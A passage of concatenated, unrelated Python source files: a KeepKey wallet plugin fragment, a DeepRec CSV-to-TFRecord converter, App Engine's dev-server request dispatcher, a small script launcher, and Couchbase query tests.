multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
converter.py
|
# -*- coding:utf-8 -*-
# Copyright 2019 The DeepRec Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import multiprocessing
import sys
import time
from datetime import datetime
from multiprocessing import Process, Queue
import pandas as pd
import tensorflow as tf
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(pathname)s:%(lineno)d - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
class CSV2TFRecord(object):
def __init__(self, LABEL, NUMERICAL_FEATURES, CATEGORY_FEATURES, VARIABLE_FEATURES, gzip=False):
self.LABEL = LABEL
self.NUMERICAL_FEATURES = NUMERICAL_FEATURES
self.CATEGORY_FEATURES = CATEGORY_FEATURES
self.VARIABLE_FEATURES = VARIABLE_FEATURES
self.gzip = gzip
self.in_queue = Queue()
self.out_queue = Queue()
def __call__(self, dataframe, out_file, prebatch=1, *args, **kwargs):
"""
Transforms tablue data in pandas.DataFrame format to tf.Example protos and dump to a TFRecord file.
The benefit of doing this is to use existing training and evaluating functionality within tf
packages.
:param dataframe: intput pd.DataFrame data
:param out_file: output TFRercord file path
:param prebatch: batch size of examples to package into TFRecord file
:param args:
:param kwargs:
:return:
"""
def parsing_loop():
"""
function to be executed within each parsing process.
Args:
in_queue: the queue used to store avazu data records as strings.
out_queue: the queue used to store serialized tf.Examples as strings.
"""
while True: # loop.
raw_record = self.in_queue.get() # read from in_queue.
# logging.debug('parsing_loop raw_example:{}'.format(raw_record))
if isinstance(raw_record, str):
# We were done here.
break
features = {} # dict for all feature columns and target column.
for item in raw_record.columns:
tmp = list(raw_record[item].values)
if item in self.CATEGORY_FEATURES:
features[item] = self._int64_feature(tmp)
elif item in self.VARIABLE_FEATURES:
features[item] = self._int64_feature(tmp[0])
elif item in self.NUMERICAL_FEATURES:
features[item] = self._float_feature(tmp)
elif item in self.LABEL:
features[item] = self._int64_feature(tmp)
# create an instance of tf.Example.
example = tf.train.Example(features=tf.train.Features(feature=features))
# serialize the tf.Example to string.
raw_example = example.SerializeToString()
# write the serialized tf.Example out.
self.out_queue.put(raw_example)
def writing_loop():
"""
function to be executed within the single writing process.
Args:
out_queue: the queue used to store serialized tf.Examples as strings.
out_file: string, path to the TFRecord file for transformed tf.Example protos.
"""
options = tf.io.TFRecordOptions(compression_type='GZIP')
writer = tf.io.TFRecordWriter(out_file, options=options if self.gzip else None) # writer for the output TFRecord file.
sample_count = 0
while True:
raw_example = self.out_queue.get() # read from out_queue.
logging.debug('writing_loop raw_example:{}'.format(raw_example))
if isinstance(raw_example, str):
break
writer.write(raw_example) # write it out.
sample_count += 1
if not sample_count % 1000:
logging.info('%s Processed %d examples' % (datetime.now(), sample_count * prebatch))
sys.stdout.flush()
writer.close() # close the writer.
logging.info('%s >>>> Processed %d examples <<<<' % (datetime.now(), sample_count * prebatch))
self.sample_cnt = sample_count
sys.stdout.flush()
start_time = time.time()
# start parsing processes.
num_parsers = int(multiprocessing.cpu_count() - 1)
parsers = []
for i in range(num_parsers):
p = Process(target=parsing_loop)
parsers.append(p)
p.start()
# start writing process.
writer = Process(target=writing_loop)
writer.start()
# logging.info('%s >>>> BEGIN to feed input file %s <<<<' % (datetime.now(), self.path))
for i in range(0, len(dataframe), prebatch):
line = dataframe[i:i + prebatch]
if len(line) < prebatch:
continue
self.in_queue.put(line) # write to in_queue.
# terminate and wait for all parsing processes.
for i in range(num_parsers):
self.in_queue.put("DONE")
for i in range(num_parsers):
parsers[i].join()
# terminate and wait for the writing process.
self.out_queue.put("DONE")
writer.join()
end_time = time.time()
total_time = (end_time - start_time)
logging.warning('Total time %.2f s, speed %.2f sample/s,'
' total samples %d.' %
(total_time, len(dataframe) / total_time, len(dataframe)))
logging.info('%s >>>> END of consuming input file %s <<<<' % (datetime.now(), out_file))
sys.stdout.flush()
@staticmethod
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
@staticmethod
def _float_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
@staticmethod
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def write_feature_map(self, dateframe, path):
with open(path, 'a') as f:
for item in self.CATEGORY_FEATURES:
f.writelines(','.join([str(dateframe[item].max()), item, 'CATEGORICAL\n']))
for item in self.NUMERICAL_FEATURES:
f.write(','.join(['1', item, 'NUMERICAL\n']))
for item in self.VARIABLE_FEATURES:
pass
# f.write(','.join(['1', item, 'VARIABLE\n']))
for item in self.LABEL:
f.write(','.join([str(dateframe[item].nunique()), item, 'LABEL\n']))
|
dispatcher.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of servers and dispatch requests to them."""
import collections
import logging
import os
import threading
import urlparse
import wsgiref.headers
from google.appengine.api import request_info
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import scheduled_executor
from google.appengine.tools.devappserver2 import server
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import wsgi_server
_THREAD_POOL = thread_executor.ThreadExecutor()
ResponseTuple = collections.namedtuple('ResponseTuple',
['status', 'headers', 'content'])
class PortRegistry(object):
def __init__(self):
self._ports = {}
self._ports_lock = threading.RLock()
def add(self, port, servr, inst):
with self._ports_lock:
self._ports[port] = (servr, inst)
def get(self, port):
with self._ports_lock:
return self._ports[port]
class Dispatcher(request_info.Dispatcher):
"""A devappserver2 implementation of request_info.Dispatcher.
In addition to the request_info.Dispatcher interface, it owns servers and
manages their lifetimes.
"""
def __init__(self,
configuration,
host,
port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
server_to_max_instances,
use_mtime_file_watcher,
automatic_restart,
allow_skipped_files):
"""Initializer for Dispatcher.
Args:
configuration: An application_configuration.ApplicationConfiguration
instance storing the configuration data for the app.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
port: An int specifying the first port where servers should listen.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
server_to_max_instances: A mapping between a server name and the maximum
number of instances that can be created (this overrides the settings
found in the configuration argument) e.g.
{'default': 10, 'backend': 15}.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restart: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
"""
self._configuration = configuration
self._php_executable_path = php_executable_path
self._enable_php_remote_debugging = enable_php_remote_debugging
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = None
self._api_port = None
self._running_servers = []
self._server_configurations = {}
self._host = host
self._port = port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._server_name_to_server = {}
self._dispatch_server = None
self._quit_event = threading.Event() # Set when quit() has been called.
self._update_checking_thread = threading.Thread(
target=self._loop_checking_for_updates)
self._server_to_max_instances = server_to_max_instances or {}
self._use_mtime_file_watcher = use_mtime_file_watcher
self._automatic_restart = automatic_restart
self._allow_skipped_files = allow_skipped_files
self._executor = scheduled_executor.ScheduledExecutor(_THREAD_POOL)
self._port_registry = PortRegistry()
def start(self, api_port, request_data):
"""Starts the configured servers.
Args:
api_port: The port that APIServer listens for RPC requests on.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
"""
self._api_port = api_port
self._request_data = request_data
port = self._port
self._executor.start()
if self._configuration.dispatch:
self._dispatch_server = wsgi_server.WsgiServer((self._host, port), self)
self._dispatch_server.start()
logging.info('Starting dispatcher running at: http://%s:%s', self._host,
self._dispatch_server.port)
self._update_checking_thread.start()
if port:
port += 100
self._port_registry.add(self._dispatch_server.port, None, None)
for server_configuration in self._configuration.servers:
self._server_configurations[
server_configuration.server_name] = server_configuration
servr, port = self._create_server(server_configuration, port)
servr.start()
self._server_name_to_server[server_configuration.server_name] = servr
logging.info('Starting server "%s" running at: http://%s',
server_configuration.server_name, servr.balanced_address)
@property
def dispatch_port(self):
"""The port that the dispatch HTTP server for the Server is listening on."""
assert self._dispatch_server, 'dispatch server not running'
assert self._dispatch_server.ready, 'dispatch server not ready'
return self._dispatch_server.port
@property
def host(self):
"""The host that the HTTP server for this Dispatcher is listening on."""
return self._host
@property
def dispatch_address(self):
"""The address of the dispatch HTTP server e.g. "localhost:8080"."""
if self.dispatch_port != 80:
return '%s:%s' % (self.host, self.dispatch_port)
else:
return self.host
def _check_for_updates(self):
self._configuration.dispatch.check_for_updates()
def _loop_checking_for_updates(self):
"""Loops until the Dispatcher exits, reloading dispatch.yaml config."""
while not self._quit_event.is_set():
self._check_for_updates()
self._quit_event.wait(timeout=1)
def quit(self):
"""Quits all servers."""
self._executor.quit()
self._quit_event.set()
if self._dispatch_server:
self._dispatch_server.quit()
for servr in self._server_name_to_server.values():
servr.quit()
def _create_server(self, server_configuration, port):
max_instances = self._server_to_max_instances.get(
server_configuration.server_name)
server_args = (server_configuration,
self._host,
port,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_executable_path,
self._enable_php_remote_debugging,
self._python_config,
self._cloud_sql_config,
self._port,
self._port_registry,
self._request_data,
self,
max_instances,
self._use_mtime_file_watcher,
self._automatic_restart,
self._allow_skipped_files)
if server_configuration.manual_scaling:
servr = server.ManualScalingServer(*server_args)
elif server_configuration.basic_scaling:
servr = server.BasicScalingServer(*server_args)
else:
servr = server.AutoScalingServer(*server_args)
if port != 0:
port += 1000
return servr, port
@property
def servers(self):
return self._server_name_to_server.values()
def get_hostname(self, server_name, version, instance_id=None):
"""Returns the hostname for a (server, version, instance_id) tuple.
If instance_id is set, this will return a hostname for that particular
instances. Otherwise, it will return the hostname for load-balancing.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
instance_id: An optional str containing the instance ID.
Returns:
A str containing the hostname.
Raises:
request_info.ServerDoesNotExistError: The server does not exist.
request_info.VersionDoesNotExistError: The version does not exist.
request_info.InvalidInstanceIdError: The instance ID is not valid for the
server/version or the server/version uses automatic scaling.
"""
servr = self._get_server(server_name, version)
if instance_id is None:
return servr.balanced_address
else:
return servr.get_instance_address(instance_id)
def get_server_names(self):
"""Returns a list of server names."""
return list(self._server_name_to_server)
def get_server_by_name(self, servr):
"""Returns the server with the given name.
Args:
servr: A str containing the name of the server.
Returns:
The server.Server with the provided name.
Raises:
request_info.ServerDoesNotExistError: The server does not exist.
"""
try:
return self._server_name_to_server[servr]
except KeyError:
raise request_info.ServerDoesNotExistError(servr)
def get_versions(self, servr):
"""Returns a list of versions for a server.
Args:
servr: A str containing the name of the server.
Returns:
A list of str containing the versions for the specified server.
Raises:
request_info.ServerDoesNotExistError: The server does not exist.
"""
if servr in self._server_configurations:
return [self._server_configurations[servr].major_version]
else:
raise request_info.ServerDoesNotExistError(servr)
def get_default_version(self, servr):
"""Returns the default version for a server.
Args:
servr: A str containing the name of the server.
Returns:
A str containing the default version for the specified server.
Raises:
request_info.ServerDoesNotExistError: The server does not exist.
"""
if servr in self._server_configurations:
return self._server_configurations[servr].major_version
else:
raise request_info.ServerDoesNotExistError(servr)
def add_event(self, runnable, eta, service=None, event_id=None):
"""Add a callable to be run at the specified time.
Args:
runnable: A callable object to call at the specified time.
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
This should be set if event_id is set.
event_id: A str containing the id of the event. If set, this can be passed
to update_event to change the time at which the event should run.
"""
if service is not None and event_id is not None:
key = (service, event_id)
else:
key = None
self._executor.add_event(runnable, eta, key)
def update_event(self, eta, service, event_id):
"""Update the eta of a scheduled event.
Args:
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
event_id: A str containing the id of the event to update.
"""
self._executor.update_event(eta, (service, event_id))
def _get_server(self, server_name, version):
if not server_name:
server_name = 'default'
if server_name not in self._server_name_to_server:
raise request_info.ServerDoesNotExistError(server_name)
elif (version is not None and
version != self._server_configurations[server_name].major_version):
raise request_info.VersionDoesNotExistError()
return self._server_name_to_server[server_name]
def set_num_instances(self, server_name, version, num_instances):
"""Sets the number of instances to run for a version of a server.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
num_instances: An int containing the number of instances to run.
Raises:
ServerDoesNotExistError: The server does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
"""
self._get_server(server_name, version).set_num_instances(num_instances)
def get_num_instances(self, server_name, version):
"""Returns the number of instances running for a version of a server.
Returns:
An int containing the number of instances running for a server version.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
Raises:
ServerDoesNotExistError: The server does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
"""
return self._get_server(server_name, version).get_num_instances()
def start_server(self, server_name, version):
"""Starts a server.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
Raises:
ServerDoesNotExistError: The server does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
"""
self._get_server(server_name, version).resume()
def stop_server(self, server_name, version):
"""Stops a server.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
Raises:
ServerDoesNotExistError: The server does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
"""
self._get_server(server_name, version).suspend()
def send_background_request(self, server_name, version, inst,
background_request_id):
"""Dispatch a background thread request.
Args:
server_name: A str containing the server name to service this
request.
version: A str containing the version to service this request.
inst: The instance to service this request.
background_request_id: A str containing the unique background thread
request identifier.
Raises:
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
BackgroundThreadLimitReachedError: The instance is at its background
thread capacity.
"""
servr = self._get_server(server_name, version)
try:
inst.reserve_background_thread()
except instance.CannotAcceptRequests:
raise request_info.BackgroundThreadLimitReachedError()
port = servr.get_instance_port(inst.instance_id)
environ = servr.build_request_environ(
'GET', '/_ah/background',
[('X-AppEngine-BackgroundRequest', background_request_id)],
'', '0.1.0.3', port)
_THREAD_POOL.submit(self._handle_request,
environ,
start_response_utils.null_start_response,
servr,
inst,
request_type=instance.BACKGROUND_REQUEST,
catch_and_log_exceptions=True)
# TODO: Think of better names for add_async_request and
# add_request.
def add_async_request(self, method, relative_url, headers, body, source_ip,
server_name=None, version=None, instance_id=None):
"""Dispatch an HTTP request asynchronously.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
server_name: An optional str containing the server name to service this
request. If unset, the request will be dispatched to the default
server.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched to the default version.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched to
according to the load-balancing for the server and version.
"""
if server_name:
servr = self._get_server(server_name, version)
else:
servr = self._server_for_request(urlparse.urlsplit(relative_url).path)
inst = servr.get_instance(instance_id) if instance_id else None
port = servr.get_instance_port(instance_id) if instance_id else (
servr.balanced_port)
environ = servr.build_request_environ(method, relative_url, headers, body,
source_ip, port)
_THREAD_POOL.submit(self._handle_request,
environ,
start_response_utils.null_start_response,
servr,
inst,
catch_and_log_exceptions=True)
def add_request(self, method, relative_url, headers, body, source_ip,
server_name=None, version=None, instance_id=None,
fake_login=False):
"""Process an HTTP request.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
server_name: An optional str containing the server name to service this
request. If unset, the request will be dispatched according to the
host header and relative_url.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched according to the host header
and relative_url.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched
according to the host header and relative_url and, if applicable, the
load-balancing for the server and version.
fake_login: A bool indicating whether login checks should be bypassed,
i.e. "login: required" should be ignored for this request.
Returns:
A request_info.ResponseTuple containing the response information for the
HTTP request.
"""
if server_name:
servr = self._get_server(server_name, version)
inst = servr.get_instance(instance_id) if instance_id else None
else:
headers_dict = wsgiref.headers.Headers(headers)
servr, inst = self._resolve_target(
headers_dict['Host'], urlparse.urlsplit(relative_url).path)
if inst:
try:
port = servr.get_instance_port(inst.instance_id)
except request_info.NotSupportedWithAutoScalingError:
port = servr.balanced_port
else:
port = servr.balanced_port
environ = servr.build_request_environ(method, relative_url, headers, body,
source_ip, port,
fake_login=fake_login)
start_response = start_response_utils.CapturingStartResponse()
response = self._handle_request(environ,
start_response,
servr,
inst)
return request_info.ResponseTuple(start_response.status,
start_response.response_headers,
start_response.merged_response(response))
def _resolve_target(self, hostname, path):
"""Returns the server and instance that should handle this request.
Args:
hostname: A string containing the value of the host header in the request
or None if one was not present.
path: A string containing the path of the request.
Returns:
A tuple (servr, inst) where:
servr: The server.Server that should handle this request.
inst: The instance.Instance that should handle this request or None if
the server's load balancing should decide on the instance.
Raises:
request_info.ServerDoesNotExistError: if hostname is not known.
"""
if self._port == 80:
default_address = self.host
else:
default_address = '%s:%s' % (self.host, self._port)
if not hostname or hostname == default_address:
return self._server_for_request(path), None
default_address_offset = hostname.find(default_address)
if default_address_offset > 0:
prefix = hostname[:default_address_offset - 1]
if '.' in prefix:
raise request_info.ServerDoesNotExistError(prefix)
return self._get_server(prefix, None), None
else:
port = int(os.environ['MY_PORT'])
try:
servr, inst = self._port_registry.get(port)
except KeyError:
raise request_info.ServerDoesNotExistError(hostname)
if not servr:
servr = self._server_for_request(path)
return servr, inst
def _handle_request(self, environ, start_response, servr,
inst=None, request_type=instance.NORMAL_REQUEST,
catch_and_log_exceptions=False):
"""Dispatch a WSGI request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
servr: The server to dispatch this request to.
inst: The instance to service this request. If None, the server will
be left to choose the instance to serve this request.
request_type: The request_type of this request. See instance.*_REQUEST
module constants.
catch_and_log_exceptions: A bool containing whether to catch and log
exceptions in handling the request instead of leaving it for the
caller to handle.
Returns:
An iterable over the response to the request as defined in PEP-333.
"""
try:
return servr._handle_request(environ, start_response, inst=inst,
request_type=request_type)
except:
if catch_and_log_exceptions:
logging.exception('Internal error while handling request.')
else:
raise
def __call__(self, environ, start_response):
return self._handle_request(
environ, start_response, self._server_for_request(environ['PATH_INFO']))
def _server_for_request(self, path):
dispatch = self._configuration.dispatch
if dispatch:
for url, server_name in dispatch.dispatch:
if (url.path_exact and path == url.path or
not url.path_exact and path.startswith(url.path)):
return self._get_server(server_name, None)
return self._get_server(None, None)
|
main.py
|
from threading import Thread
import subprocess
import os
if __name__ == '__main__':
dirname = os.path.dirname(__file__)
t1 = Thread(target=subprocess.run, args=([os.path.join(dirname,"env/Scripts/python"), os.path.join(dirname,"src/python/ardui.py")],))
t2 = Thread(target=subprocess.run, args=([os.path.join(dirname,"env/Scripts/python"), os.path.join(dirname,"src/python/spectro.py")],))
t1.daemon = True;
t2.daemon = True;
t1.start()
t2.start()
t1.join()
t2.join()
|
newtuq_tests.py
|
import logging
import threading
from .tuq import QueryTests
class QueryNewTuqTests(QueryTests):
def setUp(self):
super(QueryNewTuqTests, self).setUp()
self.log.info("============== QueryNewTuqTests setup has started ==============")
self.log.info("============== QueryNewTuqTests setup has started ==============")
self.log_config_info()
def suite_setUp(self):
super(QueryNewTuqTests, self).suite_setUp()
self.log.info("============== QueryNewTuqTests suite_setup has started ==============")
self.log.info("============== QueryNewTuqTests suite_setup has started ==============")
self.log_config_info()
def tearDown(self):
self.log_config_info()
self.log.info("============== QueryNewTuqTests tearDown has started ==============")
self.log.info("============== QueryNewTuqTests tearDown has started ==============")
super(QueryNewTuqTests, self).tearDown()
def suite_tearDown(self):
self.log_config_info()
self.log.info("============== QueryNewTuqTests suite_tearDown has started ==============")
self.log.info("============== QueryNewTuqTests suite_tearDown has started ==============")
super(QueryNewTuqTests, self).suite_tearDown()
##############################################################################################
#
# SIMPLE CHECKS
##############################################################################################
def test_simple_check(self):
self.fail_if_no_buckets()
self.ensure_primary_indexes_exist()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t1 = threading.Thread(name='run_simple', target=self.run_active_requests, args=(e, 2))
t1.start()
query = 'select * from %s' %(bucket.name)
self.run_cbq_query(query)
logging.debug("event is set")
if self.monitoring:
e.set()
t1.join(100)
query_template = 'FROM %s select $str0, $str1 ORDER BY $str0,$str1 ASC' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
#No usages anywhere
def test_joins_monitoring(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
e = threading.Event()
if self.monitoring:
e = threading.Event()
t2 = threading.Thread(name='run_joins', target=self.run_active_requests, args=(e, 2))
t2.start()
query = 'select * from %s b1 inner join %s b2 on keys b1.CurrencyCode inner join %s b3 on keys b1.CurrencyCode left outer join %s b4 on keys b1.CurrencyCode' % (bucket.name, bucket.name, bucket.name, bucket.name)
actual_result = self.run_cbq_query(query)
logging.debug("event is set")
if self.monitoring:
e.set()
t2.join(100)
def test_simple_negative_check(self):
queries_errors = {'SELECT $str0 FROM {0} WHERE COUNT({0}.$str0)>3':
'Aggregates not allowed in WHERE',
'SELECT *.$str0 FROM {0}': 'syntax error',
'SELECT *.* FROM {0} ... ERROR': 'syntax error',
'FROM %s SELECT $str0 WHERE id=null': 'syntax error',}
self.negative_common_body(queries_errors)
def test_unnest(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT emp.$int0, task FROM %s emp UNNEST emp.$nested_list_3l0 task' % bucket.name
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_subquery_select(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
self.query = 'SELECT $str0, $subquery(SELECT COUNT($str0) cn FROM %s d USE KEYS $5) as names FROM %s' % (bucket.name,
bucket.name)
actual_result, expected_result = self.run_query_with_subquery_select_from_template(self.query)
self._verify_results(actual_result['results'], expected_result)
def test_subquery_from(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
self.query = 'SELECT tasks.$str0 FROM $subquery(SELECT $str0, $int0 FROM %s) as tasks' % (bucket.name)
actual_result, expected_result = self.run_query_with_subquery_from_template(self.query)
self._verify_results(actual_result['results'], expected_result)
def test_consistent_simple_check(self):
self.fail_if_no_buckets()
queries = [self.gen_results.generate_query('SELECT $str0, $int0, $int1 FROM %s ' +\
'WHERE $str0 IS NOT NULL AND $int0<10 ' +\
'OR $int1 = 6 ORDER BY $int0, $int1'),
self.gen_results.generate_query('SELECT $str0, $int0, $int1 FROM %s ' +\
'WHERE $int1 = 6 OR $str0 IS NOT NULL AND ' +\
'$int0<10 ORDER BY $int0, $int1')]
for bucket in self.buckets:
actual_result1 = self.run_cbq_query(queries[0] % bucket.name)
actual_result2 = self.run_cbq_query(queries[1] % bucket.name)
self.assertTrue(actual_result1['results'] == actual_result2['results'],
"Results are inconsistent.Difference: %s %s %s %s" %(
len(actual_result1['results']), len(actual_result2['results']),
actual_result1['results'][:100], actual_result2['results'][:100]))
def test_simple_nulls(self):
self.fail_if_no_buckets()
queries = ['SELECT id FROM %s WHERE id=NULL or id="null"']
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t3 = threading.Thread(name='run_simple_nulls', target=self.run_active_requests, args=(e, 2))
t3.start()
for query in queries:
actual_result = self.run_cbq_query(query % (bucket.name))
logging.debug("event is set")
if self.monitoring:
e.set()
t3.join(100)
self._verify_results(actual_result['results'], [])
'''MB-22550: Simple check that ensures
OBJECT_RENAME and OBJECT_REPLACE functions work as intended'''
def test_object_rename_replace(self):
rename_result = self.run_cbq_query(
'select OBJECT_RENAME( { "a": 1, "b": 2 }, "b", "c" ) ')
self.assertTrue("b" not in rename_result['results'][0]['$1']
and "c" in rename_result['results'][0]['$1'])
replace_result = self.run_cbq_query(
'select OBJECT_REPLACE( { "a": 1, "b": 2 }, 2, 3 )')
self.assertTrue(replace_result['results'][0]['$1']['b'] == 3)
str_replace = self.run_cbq_query(
'select OBJECT_REPLACE( { "a": 1, "b": 2 }, 2, "ajay" ) ')
self.assertTrue(str_replace['results'][0]['$1']['b'] == "ajay")
##############################################################################################
#
# LIMIT OFFSET CHECKS
##############################################################################################
#Not used anywhere
def test_limit_negative(self):
#queries_errors = {'SELECT * FROM default LIMIT {0}' : ('Invalid LIMIT value 2.5', 5030)}
queries_errors = {'SELECT ALL * FROM %s' : ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_limit_offset(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t4 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t4.start()
query_template = 'SELECT DISTINCT $str0 FROM %s ORDER BY $str0 LIMIT 10' % (bucket.name)
